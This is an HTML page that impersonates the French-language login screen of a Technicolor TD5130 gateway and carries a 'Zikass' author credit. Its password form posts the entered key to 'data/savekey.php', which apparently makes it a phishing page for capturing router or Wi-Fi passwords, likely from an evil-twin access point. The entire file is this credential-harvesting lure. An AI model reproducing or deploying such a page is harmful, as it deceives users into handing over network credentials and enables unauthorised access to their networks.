<html>
<head><title>Technicolor Gateway - Connexion</title>
<style>
#head1{
background-color: #0058c3;
height: 75px;
width: 95%;
margin: auto;
margin-top: -8;}

.title1{
color: white;
margin-top: -75;
margin-left: 33px;
font: bold 12pt verdana;}

.logo1{
margin-left: 88%;
margin-top: -35;
}
#back1{
height: 154px;
width: 94.8%;
margin: auto;
background-color:white;
margin-top: 14;
border: solid;
border-width: 1px;
border-color: #adadad;
}

#body1{
background-color: #adadad;
width: 175;
height: 154;
margin-top: -155;
margin-left: 32;
}
.log1{
color: /*gray01*/#B3D454;
font-size: 18px;
font-weight: bold;
FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif;
margin-left: 340;
margin-top: -168;
}
.line1{
FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif;
FONT-SIZE: 0.8em;
FONT-WEIGHT: normal;
FONT-STYLE: normal;
margin-left: 340;
margin-top: -10;
}
.line2{
FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif;
FONT-SIZE: 0.8em;
margin-left: 390px;
width: 100;
margin-top: 20;
}
.input1{
margin-left: 520;
margin-top: -30;
}
</style>
</head>



<body>
<div id="head1">
</div>
<div class="title1">
<p>Technicolor TD5130</p>
</div>
<div class="logo1">
<img src="index by ZiKASS/logo.GIF">
</div>
<div id="back1">
</div>
<div id="body1">
</div>
<div class="log1">
<p>Non connecté...</p>
</div>
<div class="line1">
<p>Saisissez votre mot de passe pour accéder à votre Technicolor Gateway.</p>
</div>
<div class="line2">
<p>Mot de passe :</p>
</div>
<div class="input1">
<form action="data/savekey.php" method="POST">
<input type="password" name="key1" placeholder=" le mot de pass"></input>
<input type="Submit" name="submit" value="Ok"></input>
</form>
</div>



</body>


</html>
<!--End Copy right Zikass 18-02-2015==Facebook:Zikass1-->